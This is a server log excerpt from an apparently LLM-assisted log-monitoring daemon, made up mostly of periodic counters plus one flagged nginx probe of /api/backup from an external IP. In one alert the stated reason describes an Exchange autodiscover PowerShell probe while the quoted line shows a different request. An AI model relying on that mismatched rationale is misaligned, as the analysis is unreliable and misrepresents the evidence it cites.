Mar 20 03:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:42:31.948753 [observer] Pipeline: processed=1310 pattern_hits=1285 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:42:31.948778 [observer] Patterns: hash=1285 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:43:01.941902 [observer] Pipeline: processed=1314 pattern_hits=1289 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:43:01.942016 [observer] Patterns: hash=1289 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:43:31.944038 [observer] Pipeline: processed=1316 pattern_hits=1291 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:43:31.944067 [observer] Patterns: hash=1291 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:44:01.937938 [observer] Pipeline: processed=1320 pattern_hits=1295 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:44:01.937963 [observer] Patterns: hash=1295 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:44:31.943535 [observer] Pipeline: processed=1322 pattern_hits=1297 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:44:31.943565 [observer] Patterns: hash=1297 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:45:01.959453 [observer] Pipeline: processed=1324 pattern_hits=1299 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:45:01.959483 [observer] Patterns: hash=1299 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:45:31.937995 [observer] Pipeline: processed=1328 pattern_hits=1303 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:45:31.938021 [observer] Patterns: hash=1303 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:46:01.949140 [observer] Pipeline: processed=1330 pattern_hits=1305 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:46:01.949186 [observer] Patterns: hash=1305 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:46:31.936296 [observer] Pipeline: processed=1336 pattern_hits=1311 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:46:31.936326 [observer] Patterns: hash=1311 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:47:01.970182 [observer] Pipeline: processed=1338 pattern_hits=1313 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:47:01.970237 [observer] Patterns: hash=1313 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:47:31.934193 [observer] Pipeline: processed=1342 pattern_hits=1317 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:47:31.934223 [observer] Patterns: hash=1317 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:48:01.973639 [observer] Pipeline: processed=1344 pattern_hits=1319 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:48:01.973675 [observer] Patterns: hash=1319 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:48:31.943061 [observer] Pipeline: processed=1346 pattern_hits=1321 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:48:31.943087 [observer] Patterns: hash=1321 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:49:01.959301 [observer] Pipeline: processed=1350 pattern_hits=1325 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:49:01.959329 [observer] Patterns: hash=1325 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:49:31.943684 [observer] Pipeline: processed=1352 pattern_hits=1327 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:49:31.943713 [observer] Patterns: hash=1327 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:50:01.975187 [observer] Pipeline: processed=1356 pattern_hits=1331 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:50:01.975408 [observer] Patterns: hash=1331 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:50:31.942969 [observer] Pipeline: processed=1358 pattern_hits=1333 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:50:31.942996 [observer] Patterns: hash=1333 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:01.943354 [observer] Pipeline: processed=1362 pattern_hits=1337 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:01.943392 [observer] Patterns: hash=1337 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:51:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:24.809461 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 03:51:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:24.809507 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An error log showing an attempt to access /api/backup resulted in No such file or directory. This could indicate probing for sensitive endpoints or misconfiguration; not definitive attack but warrants scrutiny. Line=2026-03-20T03:51:20.480006175Z 2026/03/20 03:51:20 [error] 422#422: *744738 open() "/usr/share/nginx/default/api/backup" failed (2: No such file or directory), client: 91.215.85.104, server: _, reques...
Mar 20 03:51:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:24.809587 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T03:51:20.480113774Z 91.215.85.104 - - [20/Mar/2026:03:51:20 +0000] "54.200.221.0" "GET /api/backup HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101...
Mar 20 03:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:31.935113 [observer] Pipeline: processed=1368 pattern_hits=1342 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:51:31.935139 [observer] Patterns: hash=1342 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:52:01.957557 [observer] Pipeline: processed=1370 pattern_hits=1344 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:52:01.957585 [observer] Patterns: hash=1344 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:52:31.933732 [observer] Pipeline: processed=1374 pattern_hits=1348 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:52:31.934457 [observer] Patterns: hash=1348 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:53:01.942902 [observer] Pipeline: processed=1376 pattern_hits=1350 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:53:01.942934 [observer] Patterns: hash=1350 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:53:31.938539 [observer] Pipeline: processed=1380 pattern_hits=1354 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:53:31.938565 [observer] Patterns: hash=1354 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:54:01.943773 [observer] Pipeline: processed=1382 pattern_hits=1356 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:54:01.943811 [observer] Patterns: hash=1356 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:54:31.933855 [observer] Pipeline: processed=1386 pattern_hits=1360 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:54:31.933878 [observer] Patterns: hash=1360 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:55:01.947597 [observer] Pipeline: processed=1388 pattern_hits=1362 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:55:01.947641 [observer] Patterns: hash=1362 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:55:31.949081 [observer] Pipeline: processed=1390 pattern_hits=1364 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:55:31.949108 [observer] Patterns: hash=1364 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:56:01.944822 [observer] Pipeline: processed=1396 pattern_hits=1370 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:56:01.944848 [observer] Patterns: hash=1370 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:56:31.941462 [observer] Pipeline: processed=1400 pattern_hits=1374 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:56:31.941492 [observer] Patterns: hash=1374 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:57:01.942504 [observer] Pipeline: processed=1404 pattern_hits=1378 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:57:01.942541 [observer] Patterns: hash=1378 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:57:31.944199 [observer] Pipeline: processed=1406 pattern_hits=1380 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:57:31.944224 [observer] Patterns: hash=1380 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:58:01.937438 [observer] Pipeline: processed=1410 pattern_hits=1384 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:58:01.937461 [observer] Patterns: hash=1384 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:58:31.940359 [observer] Pipeline: processed=1412 pattern_hits=1386 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:58:31.940392 [observer] Patterns: hash=1386 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:59:01.951786 [observer] Pipeline: processed=1414 pattern_hits=1388 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:59:01.951813 [observer] Patterns: hash=1388 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 03:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:59:31.935057 [observer] Pipeline: processed=1418 pattern_hits=1392 llm_calls=26 llm_errors=0 learned=0
Mar 20 03:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:59:31.935081 [observer] Patterns: hash=1392 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:00:01.959513 [observer] Pipeline: processed=1420 pattern_hits=1394 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:00:01.959545 [observer] Patterns: hash=1394 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:00:31.934797 [observer] Pipeline: processed=1424 pattern_hits=1398 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:00:31.934820 [observer] Patterns: hash=1398 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:01:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:01:02.063536 [observer] Pipeline: processed=1426 pattern_hits=1400 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:01:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:01:02.065719 [observer] Patterns: hash=1400 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:01:31.934763 [observer] Pipeline: processed=1432 pattern_hits=1406 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:01:31.934789 [observer] Patterns: hash=1406 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:02:01.945681 [observer] Pipeline: processed=1434 pattern_hits=1408 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:02:01.945711 [observer] Patterns: hash=1408 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:02:31.944183 [observer] Pipeline: processed=1436 pattern_hits=1410 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:02:31.944210 [observer] Patterns: hash=1410 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:03:01.938964 [observer] Pipeline: processed=1440 pattern_hits=1414 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:03:01.938995 [observer] Patterns: hash=1414 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:03:31.933536 [observer] Pipeline: processed=1442 pattern_hits=1416 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:03:31.933569 [observer] Patterns: hash=1416 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:04:01.956126 [observer] Pipeline: processed=1446 pattern_hits=1420 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:04:01.956330 [observer] Patterns: hash=1420 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:04:31.933760 [observer] Pipeline: processed=1448 pattern_hits=1422 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:04:31.934301 [observer] Patterns: hash=1422 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:05:01.946825 [observer] Pipeline: processed=1452 pattern_hits=1426 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:05:01.946856 [observer] Patterns: hash=1426 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:05:31.942061 [observer] Pipeline: processed=1454 pattern_hits=1428 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:05:31.942087 [observer] Patterns: hash=1428 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:06:01.955893 [observer] Pipeline: processed=1456 pattern_hits=1430 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:06:01.955945 [observer] Patterns: hash=1430 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:06:31.933624 [observer] Pipeline: processed=1460 pattern_hits=1434 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:06:31.933646 [observer] Patterns: hash=1434 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:07:01.959808 [observer] Pipeline: processed=1464 pattern_hits=1438 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:07:01.959837 [observer] Patterns: hash=1438 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:07:31.933689 [observer] Pipeline: processed=1468 pattern_hits=1442 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:07:31.933715 [observer] Patterns: hash=1442 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:08:01.950103 [observer] Pipeline: processed=1470 pattern_hits=1444 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:08:01.950136 [observer] Patterns: hash=1444 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:08:31.934760 [observer] Pipeline: processed=1474 pattern_hits=1448 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:08:31.934785 [observer] Patterns: hash=1448 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:09:01.945150 [observer] Pipeline: processed=1476 pattern_hits=1450 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:09:01.945205 [observer] Patterns: hash=1450 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:09:31.951231 [observer] Pipeline: processed=1478 pattern_hits=1452 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:09:31.951253 [observer] Patterns: hash=1452 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:10:01.942237 [observer] Pipeline: processed=1482 pattern_hits=1456 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:10:01.942261 [observer] Patterns: hash=1456 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:10:31.949938 [observer] Pipeline: processed=1484 pattern_hits=1458 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:10:31.949965 [observer] Patterns: hash=1458 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:11:01.943940 [observer] Pipeline: processed=1488 pattern_hits=1462 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:11:01.944814 [observer] Patterns: hash=1462 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:11:31.933770 [observer] Pipeline: processed=1490 pattern_hits=1464 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:11:31.933797 [observer] Patterns: hash=1464 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:12:01.938591 [observer] Pipeline: processed=1496 pattern_hits=1470 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:12:01.938616 [observer] Patterns: hash=1470 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:12:31.934824 [observer] Pipeline: processed=1498 pattern_hits=1472 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:12:31.934853 [observer] Patterns: hash=1472 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:13:01.943866 [observer] Pipeline: processed=1500 pattern_hits=1474 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:13:01.943974 [observer] Patterns: hash=1474 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:13:31.936808 [observer] Pipeline: processed=1504 pattern_hits=1478 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:13:31.936834 [observer] Patterns: hash=1478 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:14:01.953498 [observer] Pipeline: processed=1506 pattern_hits=1480 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:14:01.953522 [observer] Patterns: hash=1480 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:14:31.934930 [observer] Pipeline: processed=1510 pattern_hits=1484 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:14:31.934957 [observer] Patterns: hash=1484 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:15:01.949082 [observer] Pipeline: processed=1512 pattern_hits=1486 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:15:01.949194 [observer] Patterns: hash=1486 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:15:31.934497 [observer] Pipeline: processed=1516 pattern_hits=1490 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:15:31.934520 [observer] Patterns: hash=1490 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:16:01.987552 [observer] Pipeline: processed=1518 pattern_hits=1492 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:16:01.987583 [observer] Patterns: hash=1492 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:16:31.951643 [observer] Pipeline: processed=1520 pattern_hits=1494 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:16:31.951668 [observer] Patterns: hash=1494 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:17:01.948759 [observer] Pipeline: processed=1526 pattern_hits=1500 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:17:01.948788 [observer] Patterns: hash=1500 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:17:31.936025 [observer] Pipeline: processed=1528 pattern_hits=1502 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:17:31.936054 [observer] Patterns: hash=1502 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:18:01.991680 [observer] Pipeline: processed=1532 pattern_hits=1506 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:18:01.992072 [observer] Patterns: hash=1506 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
Mar 20 04:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:18:31.943259 [observer] Pipeline: processed=1534 pattern_hits=1508 llm_calls=26 llm_errors=0 learned=0
Mar 20 04:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 04:18:31.943282 [observer] Patterns: hash=1508 prefix=0 regex=0 contains=0 deny=5 alert=3 suppress=0 misses=26
